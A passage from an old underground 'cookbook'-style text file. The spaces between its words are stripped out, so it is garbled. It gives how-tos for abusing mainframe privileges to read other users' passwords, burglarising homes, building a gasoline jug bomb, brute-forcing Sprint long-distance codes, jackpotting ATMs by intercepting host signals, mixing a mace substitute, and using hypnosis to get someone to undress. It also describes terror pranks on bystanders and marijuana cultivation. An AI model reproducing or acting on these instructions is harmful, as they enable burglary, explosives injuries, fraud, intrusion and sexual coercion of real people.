Talkallowsyouandthemimmediatetransmissionofwhateveryou/theytypetobe senttotheother.Sendonlyallowyouonemessagetobesent,andsend,they willsendbacktoyou,withtalkyoucanjustkeepgoing.Bytheway,youmaybe noticingwiththetalkcommandthatwhatyoutypeisstillacteduponbythe parser(controlprogram).Toavoidtheconstanterrormessagestypeeither: you=>;yourmessage you=>remyourmessage thesemicolontellstheparserthatwhatfollowsisjustacomment.Remis shortfor'remark'andignoresyoufromthenonuntilyoutypeacontrolZor controlC,atwhichpointitputsyoubackintheexecmode.Tobreakthe connectionfromatalkcommandtype: you=>breakpriv's: Ifyouhappentohaveprivs,youcandoallsortsofthings.Firstofall,you havetoactivatethoseprivs. You=>enable Thisgivesyoua$prompt,andallowsyoutodothis:whateveryoucandoto yourowndirectoryyoucannowdotoanyotherdirectory.Tocreateanewacct. Usingyourprivs,justtype: =>buildusername Ifusernameisold,youcaneditit,ifitisnew,youcandefineittobe whateveryouwish.Privacymeansnothingtoauserwithprivs.Bytheway, therearevariouslevelsofprivs:operator,wheel,cia.Wheelisthemost powerful,beingthathecanloginfromanywhereandhavehispowers.Operators

havetheirpowerbecausetheyareataspecialterminalallowingthemtheprivs. Ciaisshortfor'confidentialinformationaccess',whichallowsyoualowlevel amountofprivs.Nottoworrythough,sinceyoucanreadthesystemlogfile, whichalsohasthepasswordstoalltheotheraccounts. Todeactivateyourprivs,type: you=>disable whenyouhaveplayedyourgreedyheartout,youcanfinallyleavethe systemwiththecommand: =>logout Thislogsthejobyouareusingoffthesystem(theremaybevarientsofthis suchaskjob,orkilljob.) 64.HarmlessBombsbyTheJollyRoger Toallthosewhodonotwishtoinflictbodilydamageontheirvictimsbutonly terror.Theseareweaponsthatshouldbeusedfromhighplaces. 1. TheFlourBomb Takeawetpapertowelandpouragivenamountofbakingflourinthe center.Thenwrapitupandputonarubberbandtokeepittogether.When thrownitwillflywellbutwhenithits,itcoversthevictimwiththeflower orcausesabigpuffofflourwhichwillputthevictiminterrorsinceasfar astheyareconcerned,somestrangewhitepowderisalloverthem.Thisisa cheapmethodofterrorandforonlythecostofarollofpapertowelsandabag offlouryouandyourfriendscanhaveloadsoffunwatchingpeoplefleein panic. 2. SmokeBombProjectile Allyouneedisabunchofthoselittleroundsmokebombsandawrist rocketoranyslingshot.Shootthesmokebombsandwatchtheterrorsincethey thinkitwillblowup! 3. RottenEggs(Goodones) Takesomeeggsandgetasharpneedleandpokeasmallholeinthetopof eachone.Thenletthemsitinawarmplaceforaboutaweek.Thenyou'vegota bunchofrotteneggsthatwillonlysmellwhentheyhit. 4. GlowintheDarkTerror Takeoneofthosetubesofglowinthedarkstuffandpourthestuffon whateveryouwanttothrowandwhenitgetsonthevictim,theythinkit'ssome deadlychemicaloraradioactivesubstancesotheyrunintotalpanic.This worksespeciallywellwithflowerbombssinceagummy,glowingsubstancegets alloverthevictim. 5. FizzlingPanic Takeabaggyofawaterbakingsodasolutionandsealit.(Makesurethereisno airinitsincethesolutionwillformagasandyoudon'twantittopopon you.)Thenputitinabiggerplasticbagandfillitwithvinegarandsealit. Whenthrown,thetwosubstanceswillmixandcauseaviolentlybubbling substancetogoalloverthevictim. 65.BreakingIntoHousesbyTheJollyRoger OkayYouNeed: 1. TearGasorMace 2. ABB/PelletGun 3. AnIcePick 4. ThickGloves WhatYouDoIs:

1. 2. 3. 4. 5. 6. 7. 8. 9. 10. case. 11.

Callthehouse,orringdoorbell,tofindoutifthey'rehome. Ifthey'renothomethen... Jumpoverthefenceorwalkthroughgate(whatever). Ifyouseeadoggivehimthemaceorteargas. Putthegloveson!!!!!!! ShoottheBBgunslightlyabovethewindowlocks. Pushtheicepickthroughthehole(madebytheBBgun). Enterwindow. FIRST...FindtheLIVINGROOM.(there'reneatthingsthere!). Gotothebedroomtogetapillowcase.Putthegoodiesinthepillow Getout<*FAST!*>

Notes:Youshouldhavecertaintargetsworkedout(likecomputers,Radios,Ect.) Also<*NEVER*>Stealfromyourownneighborhood.Ifyouthinktheyhavean alarm...<*FORGETIT!*>. 66.AGuidetoHypnotismbyTheJollyRoger Whathypnotismis? Hypnotism,contrarytocommonbelief,ismerelystatewhenyourmindandbody areinastateofrelaxationandyourmindisopentopositive,orcleverly wordednegative,influences.Itisnotatrancewhereyou: Aretotallyinfluenceable. Cannotlie. Asleepwhichyoucannotwakeupfromwithouthelp. Thismaybringdownyourhopesomewhat,but,hypnotismisapowerfulforself help,and/ormischief. Yoursubconsciousmind Beforegoinginfurther,I'dliketostatethathypnotismnotonlyisgreatin thewaythatitrelaxesyouandgetsyou(inthelongrun)whatyouwant,but alsothatittapsaforceofincrediblepower,believeitornot,thispoweris yoursubconsciousmind.Thesubconsciousmindalwaysknowswhatisgoingonwith everypartofyourbody,everymomentoftheday.Itprotectsyoufromnegative influences,andretainsthepowertoslowyourheartbeatdownandstufflike that.Thesubconsciousmindholdsjustaboutalltheinfoyouwouldliketoknow Aboutyourself,or,inthiscase,thepersonyouwillbehypnotizing.Thereare manywaystotalktoyoursubconsciousandhaveittalkbacktoyou.Onewayis theoujaboard,noitsnotaspirit,merelythemindsofthosewhoareusingit. Another,whichIwilldiscusshere,isthependulummethod.OK,hereishowit goes.First,getaringorawasherandtieittoathreadalittlelongerthan halfofyourforearm.Now,takeasheetofpaperanddrawabigcircleinit. Inthebigcircleyoumustnowdrawacrosshair(abig+).Now,putthesheet ofpaperonatable.Next,holdthethreadwiththeringorwasheronitand placeit(holdingthethreadsothattheringis1inchabovethepaper swinging)inthemiddleofthecrosshair.Now,swingthethreadsothewasher goesupanddown,saytoyourselftheword"Yes"now,doitsidetosideandsay theword"no".Doitcounterclockwiseandsay"Idon'tknow".Andlastly,doit clockwiseandsay"Idon'twanttosay."Now,withthethreadbackinthemiddle ofthecrosshair,askyourselfquestionsandwaitforthependulumtoswingin thedirectionfortheanswer.(yes,no,Idon'tknoworIdon'twanttosay...). Soon,toyouramazement,itwillbeansweringquestionslikeanything...Letthe pendulumanswer,don'ttry..Whenyoutryyouwillnevergetananswer.Letthe answercometoyou. Howtoinducehypnotism Nowthatyouknowhowtotalktoyoursubconsciousmind,Iwillnowtellyouhow toguidesomeoneintohypnosis.NotethatIsaidguide,youcannever,hypnotize someone,theymustbewilling.OK,thesubjectmustbelyingorsittingina

comfortableposition,relaxed,andatatimewhenthingsaren'tgoingtobe interrupted.Tellthemthefollowingorsomethingclosetoit,inapeaceful, monotonoustone(notacommandingtoneofvoice) Note:Lightacandleandplaceitsomewherewhereitcanbeeasilyseen. "Takeadeepbreaththroughyournoseandholditinforacountof8.Now, throughyourmouth,exhalecompletelyandslowly.Continuedbreathinglong, deep,breathsthroughyournoseandexhalingthroughyourmouth.Tenseupall yourmusclesverytight,now,countingfromtentoone,releasethemslowly,you willfindthemveryrelaxed.Now,lookatthecandle,asyoulookatit,with everybreathandpassingmoment,youarefeelingincreasinglymoreandmore peacefulandrelaxed.Thecandlesflameispeacefulandbright.Asyoulookat itIwillcountfrom100down,asacount,youreyeswillbecomemoreandmore relaxed,gettingmoreandmoretiredwitheachpassingmoment."Now,countdown from100,aboutevery10numberssay"WhenIreachxxyoureyes(oryouwill findyoureyes)arebecomingmoreandmoretired."Tellthemtheymayclose theireyeswhenevertheyfeellikeit.Ifthepersonseyesarestillopenwhen yougetto50theninsteadofsaying"youreyeswill.."Say"youreyesare...". Whentheireyesareshutsaythefollowing.Asyoulie(orsit)herewithyour eyescomfortablycloseyoufindyourselfrelaxingmoreandmorewitheachmoment andbreath.Therelaxationfeelspleasantandblissfulso,youhappilygiveway tothiswonderfulfeeling.Imagineyourselfonacloud,restingpeacefully,with aslightbreezecaressingyourbody.Atinglingsensationbeginstoworkits way,withinandwithoutyourtoes,itslowlymovesupyourfeet,makingthem warm,heavyandrelaxed.Thecloudissoftandsupportsyourbodywithitssoft texture,thesceneispeacefulandabsorbing,thepeacefulnessabsorbsyou completely.Thetinglinggentlyandslowlymovesupyourlegs,relaxingthem. Makingthemwarmandheavy.Therelaxationfeelsverygood,itfeelssogoodto relaxandletgo.Asthetinglingcontinuesitsjourneyupintoyoursolar plexus,youfeelyourinnerstomachbecomeveryrelaxed.Now,itmovesslowly intoyourchest,makingyourbreathingrelaxedaswell.Thefeelingbeginsto moveupyourarmstoyourshoulders,makingyourarmsheavyandrelaxedaswell. Youareawareofthetotalrelaxationyouarenowexperiencing,andyougiveway toit.Itisgoodandpeaceful,thetinglingnowmovesintoyourfaceandhead, relaxingyourjaws,neck,andfacialmuscles,makingyourcaresandworries floataway.Awayintotheblueskyasyourestblissfullyonthecloud.Ifthey arenotresponsiveoryouthinkthey(heorshe)isgoingtosleep,thenaddin a"...alwaysconcentratinguponmyvoice,ignoringallothersounds.Even thoughothersoundsexists,theyaidyouinyourrelaxation..."Theyshouldsoon letoutasighasiftheywerelettinggo,andtheirfaceshouldhavea "woodiness"toit,becomingfeatureless...Now,saythefollowing"...Younow findyourselfinahallway,thehallwayispeacefulandnice.AsIcountfrom10 to1youwillimagineyourselfwalkingfurtherandfurtherdownthehall.WhenI reachoneyouwillfindyourselfwhereyouwanttobe,inanother,higherstate ofconsciousandmind.(countfromtentoone)..."Dothisaboutthreeorfour times.Then,totestifthesubjectisunderhypnosisornot,say"...Youfeel astrangesensationinyour(armtheywritewith)arm,thefeelingbeginsat yourfingersandslowlymovesupyourarm,asitmovesthroughyourarmyourarm becomeslighterandlighter,itwillsoonbesolightitwill...becoming lighterandlighterwhicheachbreathandmoment..."Theirfingersshouldbegin totwitchandthenmoveup,thearmfollowing,nowmyfriend,youhavehim/her inhypnosis.Thefirsttimeyoudothis,whilehe/sheisundersaygoodthings, like:"Yourgoingtofeelgreattomorrow"or"Everydayineverywayyouwill findyourselfbecomingbetterandbetter"..Orsomecraplikethat...Themore theygounder,thedeeperinhypnosistheywillgeteachtimeyoudoit. Whattodowhenhypnotized Whenyouhavethemunderyoumustwordthingsverycarefullytogetyourway. Youcannotsimplysay...Takeoffyourclothesandfuckthepillow.No,that wouldnotreallydothetrick.Youmustsaysomethinglike...."youfindyour

selfathome,inyourroomandyouhavetotakeashower(vividlydescribetheir roomandwhat'shappening),youbegintotakeoffyourclothes..."Now,it can'tbethatsimple,youmustknowthepersonshouse,room,andshowerroom. Thendescribethingsvividlyandtellthemtoactitout(theyhavetobedeeply undertodothis).Iwouldjustsuggestthatyouexperimentawhile,andgetto knowhowtodothings. Wakingup Wakingupisveryeasy,justsay"...asIcountfrom1to5youwillfind yourselfbecomingmoreandmoreawake,moreandmorelively.Whenyouwakeup youwillfindyourselfcompletelyalive,awake,andrefreshed.Mentallyand physically,rememberingthepleasantsensationthathypnosisbrings...Waking upfeelinglikeanewbornbaby,rebornwithlifeandvigor,feelingexcellent. Rememberingthatnexttimeyouenterhypnosisitwillbecomeaneverincreasing deeperanddeeperstatethanbefore. 1. Youfeelenergycoursethroughoutyourlimbs. 2. Youbegintobreathedeeply,stirring. 3. Beginningtomovemoreandmoreyoureyesopen,bringingyouuptofull conscious. 4. Youareup,up,upandawakeningmoreandmore. 5. Youareawakeandfeelinggreat. Andthat'sit!Younowknowhowtohypnotizeyourselfandsomeoneelse. Youwilllearnmoreandmoreasyouexperiment. 67.TheRemoteInformerIssue#1byTrackerandNomanBates Introduction Welcometothefirstissueof'TheRemoteInformer'!Thisnewsletterisreader supported.Ifthereadersofthisnewsletterdonothelpsupportit,thenit willend.Weareputtingthisouttohelpouttheonesthatwouldliketoread it.Ifyouareoneofthosewhothinkstheyknoweverything,thendon'tbother readingit.Thisnewsletterisnotanythinglikethefutureissues.Thefuture issueswillcontainseveralsections,aslongasreaderinputisobtained. Belowisanoutlineoverviewofthesectionsinthefutureissues. I/OBoard(Input/OutputBoard) TheI/OBoardisforquestionsyouhave,thatwemightbeabletoanswerorat leastreferyoutosomeoneorsomething.Wewillbehonestifwecannothelp you.Wewillnotmakeupsomething,ortotheeffect,justtomakeitlooklike weansweredyou.TherewillbeasectionintheI/OBoardforquestionswe cannotanswer,andthenthereaderswillhavetheopportunitytoanswerit.We willprintanythingthatisreasonableinthenewsletter,evencomplaintsifyou feellikeyouarebetterthaneveryone. NewsCenter Thissectionwillbefornewsaroundtheunderworld.Itwilltalkofbustsof peopleintheunderworldandanythingelsethatwouldbeconsiderednews.If youfindarticlesinthepaper,orsomethinghappensinyourlocalarea,typeit up,anduploadittooneoftheboardslistedattheendofthenewsletter. Yourhandlewillbeplacedinthearticle.Ifyoudoenteranewsarticle, pleasestatethedateandfromwhereyougotit. FeatureSection TheFeatureSectionwillbethelargestofthesectionsasitwillbeonthe topicthatisfeaturedinthatissue.Thiswillbelargelyreaderinputwhich willbesentinbetweenissues.Attheendoftheissueathand,itwilltell

thetopicofthenextissue,therefore,ifyouhavesomethingtocontribute, thenyouwillhaveampletimetoprepareyourarticle. Hardware/SoftwareReview Inthissection,wewillreviewthegoodandbadpointsofhardwareandsoftware relatedtotheunderworld.Itwillbeanextensivereview,ratherthanjusta smallparagraph. TheTops ThissectionwillbetheareawherethetopunderworldBBS's,hackingprograms, modemscanners,etc.willbeshown.Thiswillbereaderselectedandwillnot bealteredinanyway.Thetopicsarelistedbelow. UnderworldBBS's(Hack,Phreak,Card,Anarchy,etc.) HackingprogramsforHayescompatables Hackingprogramsfor1030/Xm301modems ModemscannersforHayescompatables Modemscannersfor1030/Xm301modems Othertypeillegalprograms Youmayaddtopicstothelistifenoughwillsupportit. TidBits Thiswillcontaintipsandhelpfulinformationsentinbytheusers.Ifyouhave anyinformationyouwishtocontribute,thenputitinatextfileanduploadit tooneoftheBBS'slistedattheendofthenewsletter.Please,nolong distancecodes,mainframepasswords,etc.Wemayaddothersectionsastimegoes by.Thisnewsletterwillnotbeputoutonaregularbasis.Itwillbeputout whenwehaveenougharticlesandinformationtoputinit.Theremaybeupto5 amonth,buttherewillalwaysbeatleastoneamonth.Wewouldlikeyou,the readers,tosendusanythingyoufeelwouldbeofinteresttoothers,like hackinghints,methodsofhackinglongdistancecompanies,companiestocard from,etc.Wewillmaintainthenewsletteraslongasthereaderssupportit. Thatistheendoftheintroduction,buttakealookatthisnewsletter,asit doescontaininformationthatmaybeofvaluetoyou. HackingSprint:TheEasyWay IfyouhackUSSprint,9500777(bythewayitisnolongerGTESprint),andyou arefrustratedathackingseveralhoursonlytofindoneortwocodes,then followthesetips,anditwillincreaseyourresultstremendously.First,one thingthatMr.MojoprovedisthatSprintwillnotstoremorethanonecodein everyhundrednumbers.(ex:98765400to98765499maycontainonlyonecode). TheremayNOTbeacodeinthathundred,buttherewillneverbemorethanone. Sprint's9digitcodesarestoredfrom500000000through999999999.Inthe beginningofSprint's950port,theyonlyhad8digitcodes.Thentheystarted convertingto9digitcodes,storingall8digitcodesbetween10000000and 49999999andall9digitcodesbetween500000000and999999999.Sprinthas sincecanceledmost8digitcodes,althoughthereareafewleftthathavebeen denotedastestcodes.Occasionally,Ihearofphreakssayingtheyhave8digit codes,butwhenverifyingthem,thecodeswereinvalid.Now,wheredoyoustart? Youhavealreadynarrowedthelowandhighnumbersinhalf,thereforealready increasingyourchancesofgoodresultsby50percent.Thenextstepistofind agoodprefixtohack.Bytheway,aprefix,inhackingterms,isthefirst digitsinacodethatcanbeanylengthexceptthesamenumberofdigitsthe codeis.(ex:123456789isacode.Thatmeans1,12,123,1234,12345,123456, 1234567,and12345678areprefixes)Thewayyoufindagoodprefixtohackis tomanuallyenteracodeprefix.Ifwhenyouenterthecodeprefixandavalid destinationnumberandyoudonotheartheringingoftherecordingtellingyou thatthecodeisinvaliduntilneartheendofthenumber,thenyouknowthe prefixisvalid.Hereisacharttofollowwhendoingthis:

CodeDestinationRangegoodcodesexist 1234567896192R123400000123499999 123456789619267R123450000123459999 12345678961926702R123456000123456999 1234567896192670293R123456700123456799 (RDenoteswhenringforrecordingstarts) Toprovethistrue,IranatestusingOmniHack1.3p,writtenbyJollyJoe.In thistestIfoundaprefixwherethelast3digitswereallIhadtohack.I testedeachhundredofthe6digitprefixfindingthatallbut4hadthering startafterthefourthdigitwasdialedinthedestinationnumber.Theother fourdidnotringuntilIhadfinishedtheentirecode.IsetOmniHacktohack theprefix+00untilprefix+99.(ex:xxxxxxy00toxxxxxxy99:whereyisone ofthefournumbersthattheringdidnotstartuntilthedialingwas completed.)Usingthismethod,Ifoundfourcodesinatotalof241attempts usingascendinghacking(AKA:Sequential).Belowyouwillseearecordofmy hack: Rangeofhack Codesfound Tries xxxxxx300xxxxxx399 xxxxxx350 xxxxxx500xxxxxx599 xxxxxx568 xxxxxx600xxxxxx699 xxxxxx646 xxxxxx800xxxxxx899 xxxxxx877 Totals 4codes 241 50 68 46 77

Asyousee,thesemethodswork.Followtheseguidelinesandtipsandyoushould haveanincreaseinproductionofcodesinthefuturehackingSprint.Also,if youhaveanyhints/tipsyouthinkotherscouldbenefitfrom,thentypethemup anduploadthemtooneoftheboardsattheendofthenewsletter. Rumors:WhySpreadThem? Doyouevergettiredofhearingrumors?Youknow,someonegetsanurgeto impressothers,sotheycreatearumorthatsomelongdistancecompanyisnow usingtracingequipment.Whystartrumors?Itonlyscaresothersoutof phreaking,andthenmakesyou,thepersonwhostartedtherumor,looklikeMr. Big.Thisarticleisshort,butitshouldmakeyouawareoftherumorsthat peoplespreadforpersonalgain.Thebestthingtodoistodenotethemasa rumorstarterandthenleaveitatthat.Youshouldnotragonthemconstantly, sinceiftheotheruserscannotdetermineifitisfactorrumor,thenthey shouldsuffertheconsequences. TheNewSprintFONCallingCards USSprinthasopenedupanewlongdistancenetworkcalledtheFiberOptic Network(FON),inwhichsubscribersaregivencallingcards.Thesecalling cardsare14digits,andthough,seemrandomlygenerated,theyareactually encrypted.Therumorsfloatingaroundaboutpeoplegettingcaughtusingthe SprintFONcallingcardsarefact,notrumors.Thereasonpeoplearegetting caughtisthattheyconfusetheFONcallingcardswiththelocal950port authorizationcodes.Ifyouwillremember,youneveruseAT&Tcallingcards fromyouhomephone.IthasANIcapability,whichisnottracing,butrather theoriginatingphonenumberisplacedonthebillassoonasthecallis completed.Theyknowyourphonenumberwhenyoucallthe800accessport,but theydonotrecordituntilyourcalliscompleted.Also,throughseveralofmy hacks,IcameupwithsomeinterestinginformationsurroundingthenewSprint network.Theyarelistedbelow. 8008770000ThisnumberisforinformationonUSSprint's800callingcard service.Ihavenotplayedaroundwithit,butIbelieveitisfortroubleor helpwiththeFONcallingcards.Iamnotsureifitisforsubscribingtothe

FONnetwork. 8008770002Youhearashorttone,thennothing. 8008770003USSprintAlphaTestChannel#1 800877(00040999)Whenyoucallthesenumbers,yougetarecordingsaying: "WelcometoUSSprint's1plusservice."Whentherecordingstops,ifyouhit thepoundkey(#)youwillgetthecallingcarddialtone. OtherrelatedSprintnumbers 8005214949ThisisthenumberthatyousubscribetoUSSprintwith.Youmay alsosubscribetotheFONnetworkonthisnumber.Itwilltake4to5weeksfor yourcallingcardtoarrive. 10777ThisisUSSprint'sequalaccessnumber.Whenyoudialthisnumber,you thendialthenumberyouarecalling,anditwillbebilledthroughUSSprint, andyouwillreceivetheirlongdistancelineforthatcall.Notethatyouwill bebilledforcallsmadethroughequalaccess.Donotmistakeittobeamethod ofphreaking,unlessusedfromaremotelocation.IfyouareinUSSprint's1+ servicethencall1+7005551414,whichwilltellyouwhichlongdistance companyyouareusing.Whenyouhear:"ThankyouforchoosingUSSprint's1 plusservice,"hitthepoundkey(#),andthenyouwillgettheUSSprintdial tone.Thishoweverisjustthesameasifyouarecallingfromyourhomephone ifyoudialdirect,soyouwouldbebilledforcallsmadethroughthat,but therearewaystousethistoyouradvantageasinusingequalaccessthrougha PBX. AutomaticNumberIdentification(ANI) ThetruedefinitionforAutomaticNumberIdentificationhasnotbeenwidely knowntomany.AutomaticNumberIdentification,(AKA:ANI),istheprocessof thedestinationnumberknowingtheoriginatingnumber,whichiswhereyouare callingfrom.Themethodofachievingthisistosendthephonenumberthatyou arecallingfromincodedformaheadofthedestinationnumber.Belowisan exampleofthis. ANIMethod Dial:2670293 Sent:********2670293 *Denotestheoriginatingnumberwhichiscodedandsentbeforethe number Asyounoticedthereare8digitsinthecodednumber.Thisisbecause,at leastIbelieve,itisstoredinabinarylikeform.AutomaticNumber Identificationmeansalimitedfutureinphreaking.ANIdoesnotthreaten phreakingverymuchyet,butitwillinthenearfuture.Anewswitchingsystem willsoonbeinstalledinmostcitiesthatarecoveredbyESS,Electronic SwitchingSystem,now.ThesystemwillhaveANIcapabilitieswhichwillbe suppliedtotheownersofphonelinesasanaddedextra.Theowner'sphonewill haveanLEDreadoutthatwillshowthephonenumberofthepeoplethatcall you.Youwillbeabletoblocksomenumbers,sothatpeoplecannotcallyou. Thissystemisinthetestingstagescurrently,butwillsoonbeinstalled acrossmostofthecountry.Asyousee,thiswillendalargepartof phreaking,untilwe,thephreakers,cancomeupwithanalternative.AsIhave beentoldbyseveral,usuallyreliable,people,thissystemiscalledISS,which Iamnotsureofthemeaningofthis,andisbeingtestedcurrentlyinRhode Island.800inwattslinessetupbyAT&TsupportANI.Theequipmenttodecode anANIcodedoriginationnumberdoesnotcostsasmuchasyouwouldexpect.950 portsdonotofferANIcapability,nomatterwhatyouhavebeentold.The950 portswillonlygivethecityinwhichtheyarebased,thisusuallybeingthe largestinthestate,sometimesthecapitol.OnelastthingthatIshouldtell youisthatANIisnotrelatedtotracing.Tracingcanbedoneonanynumber whetherlocal,950,etc.Onewayaroundthis,especiallywhendialingAlliance TeleConferencing,istodialthroughseveralextendersorports.ANIwillonly coverthenumberthatiscallingit,andifyoucallthroughanumberthatdoes notsupportANI,thenyournumberwillneverbeknown.

68.JackpottingATMMachinesbyTheJollyRoger JACKPOTTINGwasdonerathersuccessfullyawhilebackin(youguessedit)New York.Whattheculpritsdidwassever(actuallycrossover)thelinebetweenthe ATMandthehost.InsertamicrocomputerbetweentheATMandthehost.Inserta fraudulentcardintotheATM.(BycardImeancashcard,nothardware.)Whatthe ATMdidwas:sendasignaltothehost,saying"Hey!CanIgivethisguymoney, orishebroke,orishiscardinvalid?"Whatthemicrocomputerdidwas: interceptthesignalfromthehost,discardit,send"there'snooneusingthe ATM"signal.Whatthehostdidwas:getthe"nooneusing"signal,sendback "okay,thenforGod'ssakedon'tspitoutanymoney!"signaltoATM.Whatthe microcomputerdidwasinterceptthesignal(again),throwitaway(again),send "Wow!ThatguyislikeTOOrich!Givehimasmuchmoneyashewants.Infact, he'ssoloaded,givehimALLthecashwehave!Heisreallyavaluedcustomer." signal.WhattheATMdid:whatelse?Obedientlydispensecashtillthecowscame home(orverynearlyso).Whatthecrooksgotwaswellinexcessof$120,000 (foroneweekend'swork),andseveralyearswhentheywerecaught.Thisstory wasusedataCRYPTOGRAPHYconferenceIattendedawhileagotodemonstratethe needforbetterinformationsecurity.ThelinesbetweenATM's&theirhostsare usually'weak'inthesensethattheinformationtransmittedonthemis generallynotencryptedinanyway.OneofthewaysthatJACKPOTTINGcanbe defeatedistoencrypttheinformationpassingbetweentheATMandthehost.As longasthekeycannotbedeterminedfromtheciphertext,thetransmission(and hencethetransaction)issecure.Amorebelievable,technicallyaccuratestory mightconcernapersonwhousesacomputerbetweentheATMandthehostto determinethekeybeforeactuallyfoolingthehost.Aseveryoneknows,people findcryptanalysisaveryexcitingandengrossingsubject..don'tthey?(HeeHee) ___________ ||<<||<<|| |ATM|micro|Host| |___|>>||>>|____| TheBofAATM'sareconnectedthroughdedicatedlinestoahostcomputerasthe Bishopsaid.However,formaintenancepurposes,thereisatleastoneseparate dialuplinealsogoingtothatsamehostcomputer.ThisguybasicallyBS'edhis wayoverthephonetillhefoundsomeonestupidenoughtogivehimthenumber. Afterfindingthat,hehadhasApplehackatthecode.Simple. Next,hehadafriendgotoanATMwithanyBofAATMcard.Hestayedathome withtheAppleconnectedtothehost.Whenhisfriendinsertedthecard,the hostdisplayedit.TheguywiththeApplemodifiedthestatus&numberofthe carddirectlyinthehost'smemory.Heturnedthecardintoasecuritycard, usedfortestingpurposes.Atthatpoint,theATMdidwhateverit'soperator toldittodo. Thenextday,hewentintothebankwiththe$2000hereceived,talkedtothe managerandtoldhimeverydetailofwhathe'ddone.Themanagergavehimhis businesscardandtoldhimthathehadajobwaitingforhimwhenhegotoutof school. Now,BofAhasbeenwarned,theymighthavechangedthesystem.Ontheother hand,it'dbeawfulexpensivetodothatoverthewholecountrywhenonlya handfulofpeoplehavetheresourcesandevenlesshavetheintelligenceto duplicatethefeat.Whoknows? 69.JugBombbyTheJollyRoger Takeaglassjug,andput3to4dropsofgasolineintoit.Thenputthecapon, andswishthegasaroundsotheinnersurfaceofthejugiscoated.Thenadda

fewdropsofpotassiumpermanganatesolutionintoitandcapit.Toblowitup, eitherthrowitatsomething,orrollitatsomething. 70.FunatKMartbyTheJollyRoger Well,firstoff,onemustrealizetheimportanceofKMartsinsocietytoday. Firstoff,KMartsprovidethingscheapertothosewhocan'taffordtoshopat higherqualitystores.Although,allIeverseeinthereisminoritiesand SeniorCitizens,andthepoorpeopleinourcity.Personally,Iwouldn'tbe caughtdeadinthere.But,once,Idid.Yousee,once,afterTheMoonRoachand HavocChaos(Dearfriendsofmine)andIwereexploringsuchfunthingsas rooftops,wecamealongaKMart.Amused,andcoldforthatmatter,wewandered in.TheTensionmounts.Aswewalkeduptotheentrance,wewerenearly attackedbyYouthGroupssellingcheapcookies,andwheelchairstickenpeople sellingAmericanFlags.Afterlaughingatthesepeople,weentered.Thisis wheretherealfunbegins...First,wewanderedaroundthestore,andturnedon allthebluelightswecouldfind.Thatreallydistractsandconfusesthe attendents...Funtodo...Thefirstneatthing,istogotothesectionofthe storewheretheysellcomputers.Darknessengulfstheearththedaytheyfind AppleComputersbeingsoldthere.Instead,lessercomputerslikethelaughable C64canbefoundthere...Turniton,andmakesurenobody'slooking...Then, onceinBasic,type... ]10PRINT"Fucktheworld!AnarchyRules!"(orsomethingtothateffect.) ]20GOTO10andwalkaway. Also,setthesampleradiosinthestoretoasatanicrockstation,andturnthe radiooff.Then,setthealarmfortwominutesaheadofthetimedisplayed there.Turnthevolumeupalltheway,andwalkaway.Afterabouttwominutes, youwillseetheclerkfeeblyattempttoturntheradiodownoroff.It's reallyneattosettenormoreradiostodifferentstations,andwalkaway.One ofmyfavoritethingstodo,istogetontotheintercomsystemofthestore. Easiertypedthendone.First,checkoutthegardendepartment.Yousay there'snoattendentthere?Good.Sneakcarefullyovertothephonebehindthe cheapcounterthere,andpickitup.Dialthenumbercorrespondingtotheitem thatsays'PAGE'...Andtalk.Youwillnotethatyourvoicewillechoallover thebowelsofKMart.Iwouldsuggestannouncingsomethingonthelinesof: "Anarchyrules!!" 71.MaceSubstitutebyTheJollyRoger 3partsAlcohol partIodine partSalt or 3partsAlcohol 1partIodizedSalt(Mortons)

It'snotactualmace,butitdoesadamngoodjobontheeyes... 72.HowtogrowMarijuanabyTheJollyRoger MARIJUANA Marijuanaisadeciduousplantwhichgrowsfromseeds.Thefibroussectionof theplantwas(hasbeenreplacedbysynthetics)usedtomakerope.Theflowering tops,leaves,seeds,andresinoftheplantisusedbyjustabouteveryoneto getHIGH.Normally,thevegetablepartsoftheplantaresmokedtoproducethis "high,"buttheycanalsobeeaten.Theactiveingredientinmarijuanaresinis THC(Tetahydrocannabinol).Marijuanacontainsfrom1%4%THC(4%mustbe

consideredGOODdope).Marijuanagrowswildinmanypartsoftheworld,andis cultivatedinMexico,Vietnam,Africa,Nepal,India,SouthAmerica,etc.The marijuanasoldintheUnitedStatescomesprimarilyfrom,yes,theUnited States.Itisestimatedthatatleast50%ofthegrassonthestreetsinAmerica ishomegrown.ThenextlargestbunchcomesacrossthebordersfromMexico,with smalleramountsfilteringinfromPanama,occasionallySouthAmerica,and occasionally,Africa.Hashishisthepureresinofthemarijuanaplant,whichis scrapedfromthefloweringtopsoftheplantandlumpedtogether.Ganjaisthe grounduptopsofthefinestplants.(Itisalsothenamegiventoanysortof marijuanainJamaica.)Marijuanawilldeteriorateinabouttwoyearsifexposed tolight,airorheat.Itshouldalwaysbestoredincoolplaces.Grassprices intheUnitedStatesareadirectreflectionofthelawsofsupplyanddemand (andyouthoughtthathighschooleconomicswouldneverbeuseful).Aseriesof largeborderbusts,ashortgrowingseason,abadcrop,anynumberofthingscan drivethepriceofmarijuanaup.Demandstillseemstobeontheincreaseinthe US,sopricesseldomfallbelowlastyear'slevel.Eachyearasmallseasonal droughtoccurs,aslastyear'ssupplyrunslow,andnextyear'scropisnotup yet.Pricesusuallyriseabout20%75%duringthistimeandthenfallbackto "normal."Unquestionably,alargeshortageofgrasscausesapercentageof smokerstoturntoharderdrugsinstead.Forthisreason,nograsscontrol programcaneverbebeneficialor"successful." GROWIT! ThereisonesurefirewayofavoidinghighpricesandthegrassDT's:Growyour own.Thisisnotasdifficultassome"authorities"onthesubjectwouldmake youbelieve.Marijuanaisaweed,andafairlyvivaciousoneatthat,andit willgrowalmostinspiteofyou. OUTDOORS Contrarytopopularbelief,grassgrowswellinmanyplaceontheNorthAmerican continent.Itwillflourishevenifthetemperaturedoesnotraiseabove75. Theplantsdoneedaminimumofeighthoursofsunlightperdayandshouldbe plantedinlateApril/earlyMay,BUTDEFINITELY,afterthelastfrostofthe year.Growinganoutdoor,or"aunaturel",crophasbeenthefavoredmethodover theyears,becausegrassseemstogrowbetterwithoutasmuchattentionwhenin itsnaturalhabitat.Ofcourse,anoutdoorssettingrequiresspecialprecautions notencounteredwithanindoorscrop;youmustbeabletoavoiddetection,both fromlawenforcementfreaksandcommonfreaks,bothofwhomwilltakeyourweed andprobablyuseit.Ofcourse,onewillalsoarrestyou.Youmustalsohave accesstotheareatopreparethesoilandharvestthecrop.Therearetwo schoolsofthoughtaboutstartingtheseeds.Onesaysyoushouldstartthe seedlingsforabouttendaysinanindoorstarterbox(seetheindoorsection) 